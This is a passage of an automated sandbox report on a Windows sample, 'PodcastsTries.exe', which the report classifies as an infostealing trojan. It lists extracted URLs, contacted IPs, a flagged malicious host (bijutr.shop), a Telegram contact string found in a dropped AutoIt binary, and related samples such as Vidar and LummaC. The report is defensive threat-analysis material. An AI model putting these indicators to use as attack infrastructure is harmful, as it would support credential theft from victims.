                                                                                                      http://anglebug.com/6876Fchrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://drive.google.com/?lfhs=2chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://anglebug.com/6248chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000012.00000003.2775654512.0000278001C44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2788157585.0000278000DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2774896977.0000278001CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776169900.0000278001CE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://anglebug.com/8229Ichrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://anglebug.com/6929chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://google-ohttp-relay-join.fastly-edge.com/Ynchrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://anglebug.com/5281chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhoneschrome.exe, 00000012.00000002.2816170246.0000278000F8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.youtube.com/?feature=ytcachrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icouechrome.exe, 00000012.00000003.2739003701.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812647167.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2759214939.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776245551.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2735408123.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2785855672.0000278000C2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://issuetracker.google.com/255411748msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://docs.google.com/document/u/0/create?usp=chrome_actionschrome.exe, 00000012.00000002.2811350010.000027800080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811255241.00002780007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810055623.00002780004DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812065716.0000278000A50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://anglebug.com/7246chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://anglebug.com/7369chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://anglebug.com/7489chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://duckduckgo.com/?q=chrome.exe, 00000012.00000002.2811895050.00002780009C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812775099.0000278000C5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://chrome.google.com/webstorechrome.exe, 00000012.00000003.2722102002.00002780004C0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2882165201.000026600016C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.3000415537.000074F40238C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://drive-daily-2.corp.google.com/manifest.json.27.drfalse
                                                                                                                                          high
                                                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiHDJEU3.12.drfalse
                                                                                                                                            high
                                                                                                                                            http://polymer.github.io/PATENTS.txtchrome.exe, 00000012.00000003.2739165122.000027800113C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2737269759.0000278001020000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2737330665.0000278001030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2809303910.00002780002FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2739266755.000027800120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2738791399.0000278000F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2738731573.0000278000F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2739029225.0000278000310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2737386416.0000278000F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2809977476.00002780004C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2737360460.0000278001080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2738761959.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2737419840.000027800104C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/previewchrome.exe, 00000012.00000003.2769737177.000027800153C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769702296.0000278001534000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://google-ohttp-relay-join.fastly-edge.com/Kjchrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 00000012.00000003.2739003701.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812647167.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2759214939.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776245551.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2735408123.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2785855672.0000278000C2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Billion.com, 0000000C.00000002.3328091669.000000000437A000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000002.3331378130.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 16PP89.12.dr, 58YU37.12.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://t.me/k04aelm0nk3Mozilla/5.0Billion.com, 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.autoitscript.com/autoit3/XBillion.com, 0000000C.00000000.2151414811.0000000000205000.00000002.00000001.01000000.00000007.sdmp, Shipping.9.dr, Billion.com.2.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://chrome.google.com/webstore?hl=en3chrome.exe, 00000012.00000002.2812036983.0000278000A34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://issuetracker.google.com/161903006msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.ecosia.org/newtab/Billion.com, 0000000C.00000002.3328091669.000000000437A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, 16PP89.12.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://drive-daily-1.corp.google.com/manifest.json.27.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://drive-daily-5.corp.google.com/manifest.json.27.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://duckduckgo.com/favicon.icochrome.exe, 00000012.00000002.2812775099.0000278000C5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 00000012.00000002.2811153144.0000278000780000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2816785979.0000278000FEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810110703.000027800050C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 00000012.00000002.2809715374.000027800040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811516626.0000278000884000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810228742.0000278000544000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://anglebug.com/3078chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://anglebug.com/7553chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://anglebug.com/5375chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://ogs.googchrome.exe, 00000012.00000002.2808631973.00002780000FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 20.189.173.2 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false |
| 149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false |
| 162.159.61.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false |
| 23.44.203.82 | unknown | United States | 20940 | AKAMAI-ASN1EU | false |
| 23.209.72.39 | unknown | United States | 20940 | AKAMAI-ASN1EU | false |
| 142.250.181.68 | www.google.com | United States | 15169 | GOOGLEUS | false |
| 20.110.205.119 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false |
| 188.245.216.205 | bijutr.shop | Iran (ISLAMIC Republic Of) | 16322 | PARSONLINETehran-IRANIR | true |
| 204.79.197.219 | unknown | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false |
| 142.250.181.65 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false |
| 172.64.41.3 | unknown | United States | 13335 | CLOUDFLARENETUS | false |
| 18.161.69.30 | sb.scorecardresearch.com | United States | 3 | MIT-GATEWAYSUS | false |
| 18.238.49.124 | unknown | United States | 16509 | AMAZON-02US | false |
| 239.255.255.250 | unknown | Reserved | unknown | unknown | false |
                                                                                                                                                                                                                                            IP
                                                                                                                                                                                                                                            192.168.2.6
                                                                                                                                                                                                                                            127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580498
Start date and time: 2024-12-24 19:26:03 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 41
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PodcastsTries.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@104/289@25/16
                                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                                                            • Number of executed functions: 81
                                                                                                                                                                                                                                            • Number of non-executed functions: 298
                                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted)
• Excluded domains from analysis (whitelisted)
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                            • VT rate limit hit for: PodcastsTries.exe
Time      Type             Description
13:26:54  API Interceptor  1x Sleep call for process: PodcastsTries.exe modified
13:27:34  API Interceptor  2x Sleep call for process: Billion.com modified
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    chrome.cloudflare-dns.comhttps://jkqbjwq.maxiite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                                                    ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                                                    SalmonSamurai.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                                                    SalmonSamurai.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                                                    https://liladelman.com/rental/1218-west-side-road-block-island/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                                                    Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                                                    nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                                                    gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                                                    trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                                                    Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                                                    bijutr.shopChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                                                    ssl.bingadsedgeextension-prod-europe.azurewebsites.netChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                                                    nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                                                    gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                                                    trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                                                    ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                                                    pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                                                    QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                                                    CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 94.245.104.56
Match, Associated Sample Name / URL, SHA 256, Detection, Threat Name, Link, Context
                                                                                                                                                                                                                                                                                    • 184.85.182.130
                                                                                                                                                                                                                                                                                    [External] 120112 Manual Policies Overview Guide_ 8VM8-WZPT3L-LYH1.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 23.195.39.65
                                                                                                                                                                                                                                                                                    CLOUDFLARENETUShttp://6p8c.enterszcainmenthub.ruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 104.21.68.200
                                                                                                                                                                                                                                                                                    d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                                                                                                                                    • 104.26.0.231
                                                                                                                                                                                                                                                                                    d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                                                                                                                                    • 104.26.1.231
                                                                                                                                                                                                                                                                                    datasett.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 104.26.3.46
                                                                                                                                                                                                                                                                                    https://tb.ldpdljrr.ru/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 104.21.30.230
                                                                                                                                                                                                                                                                                    installer.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 172.67.196.179
                                                                                                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                    • 104.21.88.181
                                                                                                                                                                                                                                                                                    badvbscript.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 1.1.1.1
                                                                                                                                                                                                                                                                                    #U65b0#U5efa #U6587#U672c#U6587#U6863.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 172.67.201.143
                                                                                                                                                                                                                                                                                    https://u48635528.ct.sendgrid.net/ls/click?upn=u001.9c3qucD-2BQzNTT0bmLRTJr37m0fhz0zdKJtvEO5GYL-2FheRuyVOh-2FQG4V3oBgBPYNynDxn_I1ksFJapfNmw0nKrksu71KTxdlg2CVrjzBUVofCtIEhaWkhL1Pph-2Ffg-2BCFbPvkCL9SX-2Fn-2BNBrku3RcjHS1atB8ladrmemt-2BtQU5680xhgoUl-2FmS0Bdj-2FOfednny-2F-2Bj2bwjjubeRvrpN0J7TGLD3CnNRzymiQOzypjCqxHhzmXtY2EWHJMJBxjl-2FHlyEIekWjEdTpTsRC8R5LaI-2BXF4kV8UeUtXxyFJLbYiR3fqcWt2evvBBECu9MeQj8TLZrmfuTf-2BJQraijp8-2BcIdxf8rnVxjHoJK1lo9-2Bkao444JbRSinVA-2FoUxeuAtdlrITU1Z6gHAn7DLZstY4XJkhkT16-2F2TN4CFt2LQ-2BEh9GWg4EPlocPi8ljTs-2B9D9RVbWdc3s2Vk2VPHSj20oCO3-2FalihBzGJuaYie5tnYaz6wBF3EqNzMXmVqRnMZwSYuGRwSMVhkchytYzt3hUH-2F51IUfn7nuhHUcUbdS8nBYneAMuB2eSDRn8IZzUkExLUascCVn8T9ImEyo0qhVsBPdJjfT9L3qli9clY1N-2BhQXDZgQnsN1Bs9PujeLzem37C62BvWnqPnqvXh5vbcvseiZwTP35DEJysw-3D-3D#mlyon@wc.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0ewUSt04rfJ0.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                                                                    • 20.198.119.84
                                                                                                                                                                                                                                                                                    #U65b0#U5efa #U6587#U672c#U6587#U6863.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 20.198.119.84
                                                                                                                                                                                                                                                                                    gYjK72gL17.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                    • 20.198.119.84
                                                                                                                                                                                                                                                                                    Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                                    • 20.198.119.84
                                                                                                                                                                                                                                                                                    Gq48hjKhZf.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                                                                                                                                                                    • 20.198.119.84
                                                                                                                                                                                                                                                                                    Gq48hjKhZf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 20.198.119.84
